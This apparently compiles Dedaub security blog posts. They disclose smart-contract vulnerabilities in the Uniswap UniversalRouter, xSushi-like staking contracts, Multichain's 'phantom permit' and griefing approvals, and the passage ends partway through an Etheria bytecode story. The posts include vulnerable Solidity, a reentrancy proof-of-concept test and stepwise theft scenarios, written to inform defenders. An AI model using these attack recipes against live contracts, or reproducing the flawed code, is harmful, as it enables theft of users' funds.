Web 3 Audit Methodology by Dedaub

 Web3 Audit Methodology

Dedaub’s Security Audit teams comprise at least two senior security researchers, as well as any support they may need (e.g., cryptography expertise, financial modeling, testing) from the rest of our team. We carefully match the team’s expertise to your project’s specific nature and requirements. Our auditors conduct a meticulous, line-by-line review of every contract within the audit scope, ensuring that each researcher examines 100% of the code. There is no substitute for deep understanding of the code and forming a thorough mental model of its interactions and correctness assumptions.

Web3 Audit Methodology | 4 Main Strategies

Reaching this level of understanding is the goal of a Dedaub audit based on our Web3 audit methodology. To achieve this, we employ strategies such as:

  • Two-phase review: during phase A, the auditors understand the code in terms of functionality, i.e., in terms of legitimate use. During phase B, the auditors assume the role of attackers and attempt to subvert the system’s assumptions by abusing its flexibility.
  • Constant challenging between the two senior auditors: the two auditors will continuously challenge each other, trying to identify dark spots. An auditor who claims to have covered and to understand part of the code is often challenged to explain difficult elements to the other auditor.
  • Thinking at multiple levels: beyond thinking of adversarial scenarios in self-contained parts of the protocol, the auditors explicitly attempt to devise complex combinations of different parts that may result in unexpected behavior.
  • Use of advanced tools: every project is uploaded to the Dedaub Security Suite for analysis by over 70 static analysis algorithms, AI, and automated fuzzing. The auditors often also write and run manual tests on possible leads for issues. Before the conclusion of the audit, the development team gets access to the online system with our automated analyses, so they can see all the machine-generated warnings that the auditors also reviewed.

Dedaub’s auditors also identify gas inefficiencies in your smart contracts and offer cost optimization recommendations. We thoroughly audit integrations with external protocols and dependencies, such as AMMs, lending platforms, and Oracle services, to ensure they align with their specifications.

Uniswap Reentrancy Vulnerability Disclosure

By the Dedaub team

Uniswap Reentrancy Vulnerability Disclosure

Uniswap Reentrancy | Uniswap Labs recently advertised a boosted $3M bounty program for bug reports over their smart contracts, and especially the new UniversalRouter and Permit2 functionality. We submitted a bug report and received a bounty — thank you! To our knowledge, ours was the only bug report that Uniswap acted upon (i.e., the only one to have apparently resulted in a commit-fix to smart contract code and a new deployment of the UniversalRouter).

The explanation of the issue is fairly straightforward, so we begin with the verbatim text of our bug report.

Clearly, the UniversalRouter should not hold any balances between transactions, or these can be emptied by anyone (e.g., by calling dispatch with a Commands.TRANSFER, or Commands.SWEEP).

This property is dangerous when combined with any possibility of untrusted parties gaining control in the middle of a user transaction. This can happen, e.g., with tainted ERC20 tokens in Uniswap pools, or with callbacks from token transfers (e.g., 721s). E.g., simple attack scenario: a user sends to the UniversalRouter funds and calls it with 3 commands:

1) Commands.V3_SWAP_EXACT_IN, swap to a specific token
2) Commands.LOOKS_RARE_721 (or any of a large number of commands that trigger recipient callbacks), purchase NFT, send it to recipientX
3) sweep amount remaining after purchase to original caller.

In this case, recipientX can easily reenter the contract (by calling transfer or sweep inside its onERC721Received handler) and drain the entire amount, i.e., also the amount of step 3.

In essence, the UniversalRouter is a scripting language for all sorts of token transfers, swaps, and NFT purchases. One can perform several actions in a row, by supplying the right sequence of commands. These commands could include transfers to untrusted recipients. In this case, it is natural to expect that the transfer should send to the recipient only what the call parameters specify, and nothing more.

However, this is not always what would happen. If untrusted code is invoked at any point in the transfer, the code can re-enter the UniversalRouter and claim any tokens already in the UniversalRouter contract. Such tokens can, for instance, exist because the user intends to later buy an NFT, or transfer tokens to a second recipient, or because the user swaps a larger amount than needed and intends to “sweep” the remainder to themselves at the end of the UniversalRouter call. And there is no shortage of scenarios in which an untrusted recipient may be called: WETH unwrapping triggers a callback, there are tokens that perform callbacks, and tokens could be themselves untrusted, executing arbitrary code when their functions get called.

Our proof-of-concept demonstrated an easy scenario:

Attached are two files. One is a replacement (slight addition) to your foundry test file, universal-router/test/foundry-tests/UniversalRouter.t.sol. The other should be dropped into the “mock” subdirectory. If you then run your standard `forge test -vvv` you will see for the relevant test the output:
======

[PASS] testSweepERC1155Attack() (gas: 126514)
Logs:
1000000000000000000

======

The last line is a console.log from the attacker showing that she got a balance in an erc20 token, although she was only sent an ERC1155 token.

The test case is simply:

function testSweepERC1155Attack() public {
 bytes memory commands = abi.encodePacked(bytes1(uint8(Commands.SWEEP_ERC1155)));
 bytes[] memory inputs = new bytes[](1);
 uint256 id = 0;
 inputs[0] = abi.encode(address(erc1155), attacker, id, 0);
 
 erc1155.mint(address(router), id, AMOUNT);
 erc20.mint(address(router), AMOUNT);
 
 router.execute(commands, inputs);
}

That is, the attacker is being sent an erc1155 token amount, but the router also has an erc20 token amount. (In reality, this would probably be due to other transfers, to happen later.) The attacker manages to steal the erc20 amount as well.

The remedy we suggested was easy:

… add a Uniswap reentrancy lock, although inelegant: no dispatching commands while in the middle of dispatching commands.

We got immediate confirmation that the issue is being examined and will be assessed for the bounty program. A couple of weeks later, we received the bounty assessment:

we would like to award you a one-time bounty of $40,000 (payable in USDC) for your contribution. This amount includes a $30,000 bounty for the report, as well as a 33% bonus for reporting the issue during our current bonus period. We have classified the issue as medium severity and appreciate your assistance in helping us improve the safety of our users and the web3 ecosystem as a whole.

Further communication clarified that the bug was assessed to have High impact and Low likelihood: the possibility of a user sending NFTs to an untrusted recipient directly (although present in the UniversalRouter unit tests) is considered “user error”. Therefore, only much more complex (and less likely) scenarios were considered valid for Uniswap reentrancy, resulting in the “low likelihood” rating.

We want to thank Uniswap Labs for the bounty and are happy to have helped!

Latent Bugs in Billion-plus Dollar Code

You are probably safe, but be aware…

Daniel Von Fange pinged me last week:

Hey, I just realized that the xSushi reward distribution contract that’s commonly cloned around would be vulnerable to complete theft if the deposit token used was an ERC777 style that allowed rentrancy.

The message set in motion the close examination of just ~15 lines of code, handling funds in the billions.

We found not one, but two latent bugs. Both have pretty specific conditions for becoming vulnerabilities. We did our best to ascertain that current deployments are not at risk. (There was a time when an attacker could steal $60M, though.) However, this doesn’t mean there’s no risk: there may be several tokens that if you intend to stake in, one can attack you, right now, let alone what can happen with future deployments.

Take-home message:

  • be extra careful with the initial stakes of xSushi-like reward contracts
  • never deploy such contracts with ERC777 underlying tokens.

and generally:

  • be aware of reentrancy threats when interacting with ERC777 tokens.

The Code

Here is an instance of the code in question, a common snippet of a staking token contract. Such code was originally used in the xSushi staking contract and has since been extensively cloned.

contract VulnerableXToken {
    // ..

    // Pay some tokens and earn some shares.
    function enter(uint256 _amount) public {
        uint256 totalToken = token.balanceOf(address(this));
        uint256 totalShares = totalSupply();
        if (totalShares == 0 || totalToken == 0) {
            _mint(msg.sender, _amount);
        } else {
            uint256 what = _amount.mul(totalShares).div(totalToken);
            _mint(msg.sender, what);
        }
        token.transferFrom(msg.sender, address(this), _amount);
    }

    // Claim back your tokens.
    function leave(uint256 _share) public {
        uint256 totalShares = totalSupply();
        uint256 what = _share.mul(token.balanceOf(address(this))).div(totalShares);
        _burn(msg.sender, _share);
        token.transfer(msg.sender, what);
    }
    
    // ..
}

The enter function just accepts an investment in an underlying token (token, in the above) and issues shares by minting staking tokens (VulnerableXToken). The staking tokens accrue rewards, and upon leave the investor can claim back their rightful proportion of the underlying token.

Bug #1

The code looks reentrancy-safe at first glance. The external call (transferFrom) happens after all state updates (_mint). So, it seems that nothing can go wrong.

Back on Feb. 24, well-known Ethereum security engineer t11s had tweeted a warning about ERC777 tokens.

killer feature of ERC777 is its receive hooks, allowing contracts to react when receiving tokens. What is not mentioned often is the respective hooks called on the senders of the funds, which MUST be called before updating the state.

Implementation Requirement:
The token contract MUST call the 
tokensToSend hook before updating the state.
The token contract MUST call the 
tokensReceived hook after updating the state.

This means that any ERC777 token is a reentrancy death trap! The token itself violates the “effects before external calls” rule: it calls out to the sender before it commits the effects of a transfer. Any caller into the token may be maintaining the effects-before-calls rule, but it may not matter, if the token itself does not. The caller should either be agnostic to the token’s effects (i.e., never read balances) or should use reentrancy locks.

What Daniel had realized regarding xSushi-like code is that the PRE-transfer hook in an ERC777 token’s transferFrom would allow an attacker to reenter (literally: re-enter, in the above code) before any funds had been transferred to the staking contract, taking advantage of any state changes made before the call. In our case, upon reentering, the VulnerableXToken balance has changed (by the internal _mint call) but the underlying token’s balance has not: there are more shares but the same funds, so, when re-entering, shares appear to be cheaper!

Of course, the underlying token does not necessarily need to be an ERC777, as this exploit could be possible for any token that implements similar callback mechanisms to the ones described.

To summarize:

  • IF the underlying token (token, in the above code) of an xSushi-like rewards contract calls back a hook (e.g., is an ERC777, which calls tokensToSend on the sender)
  • AND the underlying token does this callback before adjusting the balance,
  • THEN one can reenter and get shares cheaper, all the way to full depletion of everyone else’s funds.

Bug #2

When I shared the code in the Dedaub internal channels, Konstantinos (one of our senior engineers) immediately commented:
“I see the bug — haven’t we encountered this in an audit before?”

Indeed we had…

… but he wasn’t seeing Daniel’s bug!!!

It was an entirely different bug, based on making the division _amount.mul(totalShares).div(totalToken) round down to zero when another user is depositing. In this way, the depositor would get zero shares, but the old holders of shares would keep the newly deposited funds.

A simple attack scenario with only two depositors (attacker and victim) would go as follows:

  • The attacker is the first person to call enter and deposits amount1 of token, getting back an equal amount of shares.
  • The next depositor comes in and tries to deposit amount2 of token. The attacker front-runs them and directly transfer to the contract any amount of token greater than (amount2–1)*amount1.
  • The attacker gets no shares in return, but they have all the shares to begin with! In this way, amount2*totalShares/totalToken rounds down to zero, leaving the next depositor with nothing, while the attacker can withdraw all the deposited token by calling leave, as they own all the shares.

To see how big an impact this bug can have, consider the first transfer to the xDVF staking token:

This was a transfer for 12.5 million DeversiFi tokens, currently valued at $5 each. An attacker could have front-run that transfer and stolen all $60M worth of tokens!

Checks for Live Vulnerabilities

To determine if there are funds under threat right now, we used the Dedaub Watchdog database to query all currently-deployed contracts on Ethereum, together with their current balances.

  • There are 239 deployed Ethereum contracts with the xSushi-like enter/leave code in publicly posted source.
  • 13 of those have staked funds right now. The highest-value are xShib ($960M), xSushi ($233M), and xDVF ($72M).
  • None of those has an ERC777 as an underlying.
  • The largest value that would have been at risk of a front-running attack during the initial deposit is the $60M in xDVF, as discussed earlier.
  • We also checked Polygon, found only 4 xSushi-like contracts, none with staked funds.

Although the above numbers should be fairly complete, it’s worth noting there may still be threats we are missing. The same code could be deployed in networks other than Ethereum; vulnerable contracts may have no published source, so our search may have missed them; our balances query may be incomplete for tokens that don’t emit the expected events upon transfers; and our Polygon scan was not exhaustive — just considered the last 200K contracts or so.

And, of course, any initial staking in any xSushi-like contract, among the current 200+ deployed or future ones, is vulnerable to front-running attacks.

Conclusion

The code we looked at is very simple and problematic only in very subtle ways, not all under its control (e.g., the ERC777 reentrancy is arguably not the xSushi code’s problem). It is likely to keep getting cloned, or to have independently arisen in other settings. (In the latter case, please let us know!)

Either way, we repeat our message for awareness:

  • be extra careful with the initial stakes of xSushi-like reward contracts
  • never deploy such contracts with ERC777 underlying tokens.

and generally:

  • be aware of reentrancy threats when interacting with ERC777 tokens.

These are attack vectors that the community should know about, lest we see one of them being exploited for heavy damages.

Mass Disclosure of Griefing Vulnerabilities

This week, with the help of @drdr_zz and @wh01s7 of SecuRing, we tackled a backlog of warnings from the Dedaub Watchdog tool, notifying around 100 holders of vulnerable accounts, with some $80M in funds exposed. (@_trvalentine had earlier produced proof-of-concept code to demonstrate that the attack is valid.)

The warnings concern griefing vulnerabilities: cases where an attacker can move the victim’s funds to a contract, but this does not confer the attacker any direct benefit — only makes life harder for the victim, up to possible loss of funds.

Although there’s not much technically novel in the vulnerabilities themselves, we decided to write this report to describe the events and the mass-disclosure method, via etherscan chat messages.

A Word of Introduction

The Dedaub Watchdog tool (built over our public contract-library.com infrastructure) continuously analyzes all deployed contracts on Ethereum. It implements some-80 different analyses and combines warnings over the code with the current state of the chain. (E.g., balances, storage contents, approvals.) It is our main workhorse for discovering vulnerabilities — in the past year, we have disclosed several high-impact vulnerabilities with exposure in the billions and received 9 bug bounties totaling ~$3M. (Bounties by DeFi SaverDinngo/FurucomboPrimitiveArmorVesperBT FinanceHarvestMultichain/AnyswapRari/Tribe DAO.)

The griefing vulnerabilities of this report are a bit below this bar: they typically represent simple, direct oversight, which could be lethal, but thankfully the attacker can’t gain much by exploiting it. It’s the kind of vulnerability that we might typically silently report and forget about it.

In this case, however, the number of potential victim accounts started mounting. We had a list of 18 vulnerable contracts that exposed atransferFrom(from any victim) to untrusted callers, while holding approvals for high-value tokens from many hundreds of victims. When we actually ran the query to cross-reference vulnerable contracts with the victims that had approved them AND had balances in the exposed token, we were stunned to find 564 threatened accounts, with a total amount of funds at risk at $80M, including one account with $76M exposed!

Griefing Vulnerability

There were 2–3 different vulnerable code patterns, but the main one is quite simple. It allows transferring the victims’s funds to a bridge contract using a function callable by anyone.

Griefing Vulnerabilities

How serious this is depends on the bridge protocol’s specifics. In the best case, it is just messy: a human needs to be involved, verify that the victim’s funds were indeed transferred inadvertently and are still at the bridge, and authorize a transaction to return the funds to the victim. In the worst case, the funds remain stuck forever. Also, such vulnerability greatly increases the griefing attack surface: the bridge contract may itself be vulnerable.

Responsible Disclosure

We contacted the main bridge protocol with vulnerable contracts, but the contract was in active use. The right course of action would be to also contact potential victims directly, especially those with current exposure (i.e., combination of balance and approval over the same token).

We had a list of 564 addresses in front of us. But we did not know the identity of the account owners.

The best-practices playbook in this case seems to be:

  • Check if the address is the owner of an ENS domain and if there is a contact there.
  • In the case of addresses with significant funds, direct contact with projects (i.e., the protocol with the vulnerable contract) which very often know the identity of their largest clients/holders.
  • Use the etherscan chat feature.

Another standard concern when notifying victims is that each victim, after securing their own funds, could become a potential attacker. After discussion, we considered this risk to be small. We lowered it to a minimum by starting with the addresses with the most funds (thus reducing the potential reward / satisfaction of the attacker).

The plan was as follows:

  1. Manually verify and try to establish the identity of the addresses with the most funds through the ENS or through the official channel of communication with project teams in which they have a large share.
  2. Automated notification of holders at risk using the etherscan chat.

Manual verification turned out to be relatively simple. The address with $76M threatened was the 3rd largest holder in the XCAD Network project. @drdr_zz spoke directly to the CEO via the official channel and after only 45 minutes, the funds were safu again.

However, there were still a lot of addresses, the identities of which were unknown. Even with the etherscan chat feature, it would be very time-consuming to write to each holder separately. As far as we know, etherscan chat does not currently offer a simple API that we can hook to. However, after a little research, we determined that it works over a websockets connection.

The mechanism is as follows:

  1. A wallet owner connects her wallet (e.g., via Metamask) to the Chat application.
  2. The application assigns a valid session cookie to the user and a temporal token to authenticate the WebSocket connection.
  3. A WebSocket connection is opened using the cookie and the token is sent to the server.
  4. The user can now send chat messages via WebSocket.

We wrote a script to automate the whole process and 98 messages were sent to inform users that had over $1k exposed:

The message sent was:

Hello,

I’m a security researcher (from SecuRing, collaborating with Dedaub) and I’m writing to let you know that your account has exposed funds to contract ADDRESS, for token “TOKEN”.

Any attacker can call a function on this contract that will cause it to transferFrom your funds to the contract. The attacker does not stand to gain from this, so the risk is perhaps not critical.

However, it is a threat, and you may have significant trouble getting your funds back if it happens.

We strongly recommend removing approvals to contract ADDRESS for the “TOKEN” token. You can use the etherscan tool to do so, or any other trusted approval remover.

(This threat was automatically identified using Dedaub’s Watchdog analysis, but the threat was confirmed manually with a proof-of-concept implementation.)

Thank you.

After half a day, we started getting back “thank you” messages.

Lessons learned

  • The etherscan chat feature is a great tool for direct contact with unknown account holders. But the response time may be unsatisfactory since the holder needs to poll their account page on etherscan, and the chat feature is not too widely known and used.
  • Token approvals of this form are arguably more of a UI problem than a smart contract problem, which is why it is important to be aware of standing approvals as an account holder (just as it is to verify transactions before signing them).

It was a pleasure to have this collaboration between Dedaub and SecuRing, and hopefully we helped improve Ethereum security a bit.

The Dedaub Watchdog Service

The Dedaub Watchdog is a technology-driven continuous auditing service for smart contracts.

What does this even mean? “Technology-driven”? Is this a buzzword for “automated”? Do you mean I should trust a bot for my security? (You should never trust security to just automated solutions!) And “auditing” means manual inspection, right? Is this really just auditing with tools?

Let’s answer these questions and a few more…

Watchdog brings together four major elements for smart contract security:

  • automated, deep static analysis of contract code
  • dynamic monitoring of a protocol (all interacting/newly deployed contracts, current on-chain state, past and current transactions)
  • statistical learning over code patterns in all contracts ever deployed in EVM networks (Ethereum, BSC, Avalanche, Fantom, Polygon, …)
  • human inspection of warnings raised.

All continuously updated: if a new vulnerability is discovered, the most natural question is “am I affected?” Watchdog queries are updated to detect this and warn you.

Is it effective? Let’s just say, it is exactly the technology that we have been using internally for a little over a year. It has resulted in many disclosures of vulnerabilities in deployed contracts and 9 high-value bug bounties totaling over $3M. (Bounties by DeFi SaverDinngo/FurucomboPrimitiveArmorVesperBT FinanceHarvestMultichain/AnyswapRari/Tribe DAO.)

Analysis

At Dedaub, we have audited thousands of smart contracts, comprising tens of high-value DeFi protocols, numerous libraries and Dapps. Our customers include the Ethereum Foundation, Chainlink, Immunefi, Nexus Mutual, Liquity, DeFi Saver, Yearn, Perpetual, and many more. Since 2018, we’ve been operating contract-library, which continuously decompiles all smart contracts deployed on Ethereum (plus testnets, Polygon, and soon a lot more).

But our background comes from deep program analysis. The Dedaub founders are top researchers in this space, with tens of research publications. (Here are a few recent ones, specifically on our smart contract analysis technology — including the main paper on the technology behind the Watchdog analyses.)

The Watchdog service brings together all our expertise: it captures much of the experience from years of smart contract auditing as highly-precise static analyses. It is an analysis service that goes far beyond the usual linters for mostly-ignorable coding issues. It finds real issues, with high fidelity/precision.

So, what does Watchdog analyze for? There are around 80 analyses at the time of writing, in mid-2022. By the time you read this, there will likely be several more. Here are a few important ones for illustration.

DeFi-specific analyses

  • Is there a swap action on a DEX (Uniswap, Sushiswap, etc.) that can be attacker-controlled, with respect to token, timing manipulation, or expected returned amount? Such analyses of the contract code are particularly important to combine with the current state of the blockchain (e.g., liquidity in liquidity pools) for high-value vulnerability warnings. More on that in our “dynamic monitoring”, later.
  • Are there callbacks from popular DeFi protocols (e.g., flash loans) that are insufficiently guarded and can trigger sensitive protocol actions?
  • Are there protection schemes in major protocols (e.g., Maker) that are used incorrectly (or, more typically, with subtle assumptions that may not hold in the client contract code)?

Cryptographic/permission analyses

  • Does a permit check all sensitive arguments?
  • Does cryptographic signing follow good practices, such as including the chain id in the signed data? (If not, is the same contract also deployed on testnets/other chains, so that replay attacks are likely?)
  • Can an untrusted user control (“taint”) the arguments of highly sensitive operations, such as approvetransfer, or transferFrom? If so, does the contract have actual balances that are vulnerable?

Statistical analyses

  • Compare the contract’s external API calls to the same API calls over the entire corpus of deployed contracts. Does the contract do something unusual? E.g., does it allow an external caller to control, say, the second argument of the call, whereas the majority of other contracts that make the same call do not allow such manipulation?
    Such generic, statistical inferences capture a vast array of possible vulnerabilities. These include some we have discussed above: e.g., does the contract use Uniswap, Maker, Curve, and other major protocols correctly? But statistical observations also capture many unknown vulnerabilities, use of less-known protocols, future patterns to arise, etc.

Conventional analyses

  • Watchdog certainly analyzes for well-known issues, such as overflow, reentrancy, unbounded loops, wrong use of blockhash entropy, delegatecalls that can be controlled by attackers, etc. The challenge is to make such analyses precise. Our technology does exactly that.

Yet-unknown vulnerabilities

We continuously study every new vulnerability/attack that sees the light of day, and try to derive analyses to add to Watchdog to detect (and possibly generalize) the same vulnerability in different contracts.

Monitoring

No matter how good a code analysis is, it will nearly never become “high-value” on its own. Most of the above analyses become actionable only when combined with the current state of the blockchain(s). We already snuck in a couple of examples earlier. An analysis that checks if a contract allows an untrusted caller to do a transferFrom of other accounts’ funds is much more important for contracts that have allowances from other accounts. A warning that anyone can cause a swap of funds held in the contract is much more important if the contract has sizeable holdings, so that the swap is profitable after tilting the AMM pool. An analysis that checks that a signed message does not include a chain id is much more important for contracts that are found to be deployed on multiple chains.

Combining analysis warnings with the on-chain state of the contract (and of other contracts it interacts with) is precisely the goal of Watchdog, and how it can focus on high-promise, high-value vulnerabilities.

Inspection

Automation is never the final answer for security. Security threats exist exactly because they can arise at so many levels of abstraction: from the logical, protocol, financial level, all the way down to omitting a single token in the code. Only human intelligence can offer enough versatility to recognize the potential for sneaky attacks.

This is why Watchdog is a technology-driven continuous auditing service. It can issue warnings that focus a human’s attention to the most promising parts of the code. By inspecting warnings, the human auditor can determine whether they are likely actionable and escalate to protocol maintainers.

We call Watchdog auditors “custodians”. The custodian of a protocol is not just a code auditor, but the go-to person for all warnings, all contacts to Dedaub and to other security personnel. By subscribing to Watchdog, a project gets its designated custodian who monitors warnings, knows the contact points and how to escalate reports, coordinates with any incident response team (either in place, or ad hoc, either external, or as part of Dedaub services), and ultimately advises on the project’s security needs.

In terms of software alone, Watchdog integrates two ideas to help a custodian inspect and prioritize warnings:

  • The concept of protocols: all contracts monitored are grouped into protocols, based on deployers and interactions. Any new contracts that get deployed are automatically grouped into their protocol and monitored. Reports and watchlists are easy to define to match the project’s needs.
  • Flexibility in the amount of warnings issued: Watchdog comes with different levels of service. The minimum level gets roughly a couple of hours per week of a custodian’s time. At this level, the custodian will likely only issue the highest-confidence warnings and inspect them very quickly.
    The next level of support, intended to be the middle-of-the-road offering, covers roughly two auditor-days per month. At that level, the custodian can spend significant time, at least every couple of weeks, to inspect a broader range of warnings. Watchdog supports this configurability seamlessly: it lets the custodian select warning kinds and mix them with many filters, to produce an inspection set that is optimal for covering in a given amount of time.

Contact Us … Soon

The Watchdog service has already had a handful of early institutional adopters (such as Nexus Mutual and the Fantom blockchain, both securing multiple protocols). We are currently enhancing our infrastructure and organizational capability, to launch Watchdog to broad availability (for individual protocols and not just institutional clients) by the end of 2022. You will be able to make inquiries and book a demo or live technical presentation with our team on the Dedaub Watchdog page.

Phantom Functions and the Billion-dollar No-op

By the Dedaub team

On Jan. 10 we made a major vulnerability disclosure to the Multichain project (formerly “AnySwap”). Multichain has made a public announcement that focuses on the impact on their clients and mitigation. The announcement was followed by attacks and a flashbots war. The total value of funds currently lost is around 0.5% of those directly exposed initially.

[ADVISORY: If you have ever used Multichain/Anyswap, check/revoke your approvals for vulnerable tokens. Make sure to check all chains and read the full instructions if anything is unclear.]

We will document the attacks and defense in a separate chronology, to be published after the threat is fully mitigated. This brief writeup instead intends to illustrate the technical elements of the vulnerability, i.e., the attack vector.

The attack vector is, to our knowledge, novel. The Solidity/EVM developer and security community should be aware of the threat.

In the particular case of Multichain contracts, the attack vector led to two separate, major vulnerabilities, one mainly in the WETH (“Wrapped ETH”) liquidity vault contract (an instance of AnyswapV5ERC20) and one in the router contract (AnyswapV4Router) that forwards tokens to other chains. The threat was enormous and multi-faceted — almost “as big as it gets” for a single protocol:

  • On Ethereum alone, $431M in WETH would be stolen in a single, direct transaction, from just 3 victim accounts. We demonstrated this on a local fork before the disclosure. (Balances and valuations are as of the time of original writing of this explanation, on Jan.12. The main would-be victim account, the AnySwap Fantom Bridge, was holding over $367M by itself. At the time of publication of this article, the same contract held $1.2B.)
  • The same contracts have been deployed for different tokens and on several blockchains, including Polygon, BSC, Avalanche, Fantom. (Liquidity contracts for other wrapped native tokens, such as WBNB, WAVAX, WMATIC are also vulnerable.) The risk on these other networks was later estimated at around $40M.
  • The main would-be victim account, the AnySwap Fantom Bridge, escrows tokens that have moved to the Fantom blockchain. This means that an attacker could move any sum to Fantom and then steal it back on Ethereum, together with the current $367M of the bridge (and the many tens of millions from other victims, separately). The moved tokens would still be alive (and valuable) in Fantom, or anywhere else they have since moved to. This makes the potential impact of the attack theoretically unbounded (“infinite”): any amount “invested” can be doubled, in addition to the $431M amount stolen from Ethereum victims and however much on other chains.
  • Close to 5000 different accounts had given infinite approval for WETH to the vulnerable contracts (on Ethereum). This number has since dropped substantially (especially among accounts with holdings), but there is still a threat: any WETH these accounts ever acquire is vulnerable, until approvals are revoked.

Given the above, the potential practical impact (had the vulnerability been fully exploited) is arguably in the billion-dollar range. This would have been one of the largest hacks ever—given the theoretically unbounded threat, we are not getting into more detailed comparisons.

Phantom Functions | Attack Vector

Briefly:

Callers should not rely on permit reverting for arbitrary tokens.

The call token.permit(...) never reverts for tokens that

  • do not implement permit
  • have a (non-reverting) fallback function.

Most notably, WETH — the ERC-20 representation of ETH — is one such token.

We call this pattern a phantom function— e.g., we say “WETH has a phantom permit” or “permit is a phantom function for the WETH contract”. A contract with a phantom function does not really define the function but accepts any call to it without reverting. On Ethereum, other high-valuation tokens with a phantom permit are BNB and HEX. Native-equivalent tokens on other chains (e.g., WBNB, WAVAX) are likely to also exhibit a phantom permit.

In more detail:

Smart contracts in Solidity can contain a fallback function. This is the code to be called when any function f() is invoked on a contract but the contract does not define f().

In current Solidity, fallback functions are rather exotic functionality. In older versions of Solidity, however, including fallback functions was common, because the fallback function was also the code to call when the contract received ETH. (In newer Solidity versions, an explicit receive function is used instead.) In fact, the fallback function used to be nameless: just function(). For instance, the WETH contract contains fallback functionality defined as follows:

function() public payable {
      deposit();
}
function deposit() public payable {
      balanceOf[msg.sender] += msg.value;
      Deposit(msg.sender, msg.value);
}

This function is called when receiving ETH (and just deposits it, to mint wrapped ETH with it) but, crucially, is also called when an undefined function is invoked on the WETH contract.

The problem is, what if the undefined function is relied upon for performing important security checks?

In the case of AnySwap/MultiChain code, the simplest vulnerable contract contains code such as:

function deposit() external returns (uint) {
    uint _amount = IERC20(underlying).balanceOf(msg.sender);
    IERC20(underlying).safeTransferFrom(msg.sender, address(this), _amount);
    return _deposit(_amount, msg.sender);
}
...
function depositWithPermit(address target, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s, address to) external returns (uint) {
    IERC20(underlying).permit(target, address(this), value, deadline, v, r, s);
    IERC20(underlying).safeTransferFrom(target, address(this), value);
    return _deposit(value, to);
}

This means that the regular deposit path (function deposit) transfers money from the external caller (msg.sender) to this contract, which needs to have been approved as a spender. This deposit action is always safe, but it lulls clients into a false sense of security: they approve the contract to transfer their money, because they are certain that it will only happen when they initiate the call, i.e., they are the msg.sender.

The second path to depositing funds, function depositWithPermit, however, allows depositing funds belonging to someone else (target), as long as the permit call succeeds.

For ERC-20 tokens that support it, permit is an alternative to the standard approve call: it allows an off-chain secure signature to be used to register an allowance. The permitter is approving the beneficiary to spend their money, by signing the permit request. The permit approach has several advantages: there is no need for a separate transaction (spending gas) to approve a spender, allowances have a deadline, transfers can be batched, and more.

The problem in this case, as discussed earlier, is that the WETH token has a phantom permit, so the call to it is a non-failing no-op. Still, this should be fine, right? How can a no-op hurt? The permit did not take place, so no approval/allowance to spend the target’s money should exist.

Unfortunately, however, the contract already has the approvals of all clients that have ever used the first deposit path (function deposit)!

All WETH of all such clients can be stolen, by a mere depositWithPermit followed by a withdraw call. (To avoid front-running, an attacker might split these two into different transactions, so that the gain is not immediately apparent.)

Phantom Functions | Notes:

Two separate vulnerabilities are based on the above attack vector. The first was outlined above. The second, on AnySwap router contracts, is a little harder to exploit — requires impersonating a token of a specific kind. We do not illustrate in detail because the purpose of this quick writeup is to inform the community of the attack vector, rather than to illustrate the specifics of an attack.

We have exhaustively searched for other services with similar vulnerable code and exposure. This includes vulnerable contracts with approvals over tokens with phantom permits other than WETH . Although we have found other instances of the vulnerable code patterns, the contracts currently have very low or zero approvals on Ethereum. (This kind of research is exactly what our contract-library.com analysis infrastructure lets us do quickly.) On other chains, our search has not been as exhaustive, since we have no readily indexed repository of all deployed contracts. However, our best indicators suggest that there is no great exposure outside the AnySwap/Multichain contracts.

Concluding

We have been awarded Multichain’s maximum published bug bounty of $1M for each of the two vulnerability disclosures. (Thank you for the generous recognition of this extraordinary threat!)

This was an attack discovered by first suspecting the pattern and then looking for it in actual deployed contracts. Although in hindsight the attack vector is straightforward, it was far from straightforward when we first considered it. In fact, our initial exchange, at 2:30am on a Sunday, was literally:

I had a crazy idea for a vulnerability. Want to sanity check the basics?

Crazy, indeed, how this could lead to one of the largest hacks in history.

Etheria | A Six-year-old Solc Riddle

By the Dedaub team

The Assignment

A few weeks ago, we were approached with a request to work on a project unlike any we’ve had before.

Cyrus Adkisson is the creator of Etheria, a very early Ethereum app that programmatically generates “tiles” in a finite geometric world. Etheria has a strong claim to being the first NFT project, ever! It was first presented at DEVCON1 and has been around since October 2015 — six years and counting. It is as much Ethereum “history” as can get.

Cyrus heard of us as bytecode and decompilation experts. His request was simple: try to reproduce the 6-yr old deployed bytecode of Etheria from the available sources. This is a goal of no small importance: Etheria tiles can be priced in the six digits and the history of the project can only be strengthened by tying the human-readable source to the long-running binary code.

Easy, right? Just compile with a couple of different versions and settings until the bytecode matches. Heck, etherscan verifies contracts automatically, why would this be hard?

Maybe for the simple fact that Cyrus had been desperately trying for months to get matching bytecode from the sources, to no avail! Christian Reitwiessner, the creator of Solidity and solc, had been offering tips. Yet no straightforward solution had been in sight, after much, much effort.

To see why, consider:

  • The version of solc used was likely (but not definitely) 0.1.6. Only one build of that version is readily available in modern tools (Remix) but the actual build used may have been different.
  • The exact version of the source is not pinned down with 100% confidence. The source code available was committed a couple of days after the bytecode was deployed.
  • Flags and optimization settings were not known.
  • The deployed code was produced by “browser-solidity”, the precursor of Remix. Browser-solidity is non-deterministic with respect to (we thought!) blank space and comments. (“Unstable” might be a better term: adding blank space seems to affect the produced bytecode. But we’ll stick with “non-deterministic”, since it’s more descriptive to most.)
  • Solc was not deterministic even years later.

If you want to try your hand at this, now is a good time to pause reading. It’s probably safe to say that after a few hours you will be close to convinced that this is simply impossible. Too many unknowns, too much unpredictability, produced code that is tantalizingly close but seemingly never the same as the deployed code!

Dead Ends

Our challenge consisted of finding source code or a compilation setup that would produce compiled code identical to the 6-yr old deployed Etheria bytecode.

The opening team message for the project set the tone: “We are all apprehensive but also excited about this project. It looks like a great mystery, but also a very hard and tedious search that will possibly fail.” Intellectual curiosity soon overtook all involved. People were putting aside their regular weekly assignments, working overtime to try to contribute to “the puzzle”. Some were going down a rabbithole of frantic searches for days — more on that later.

Some encouraging signs emerged at the very first look of the compiled code: when reverse-engineered to high-level code (by the lifter used in contract-library.com) it produced semantically identical Solidity-like output.

But our hopes were squashed upon more careful inspection. The low-level bytecode would always have small but significant differences. Some blocks were re-used (via jumps) in the deployed version but replicated (inlined) in the compiled version. The ordering of blocks would always be a little different. Even matching the bytecode size was a challenge: with manual tries of the (non-deterministic) compilation process, we would almost never get the deployed bytecode size down to the byte, always 2–4 bytes away.

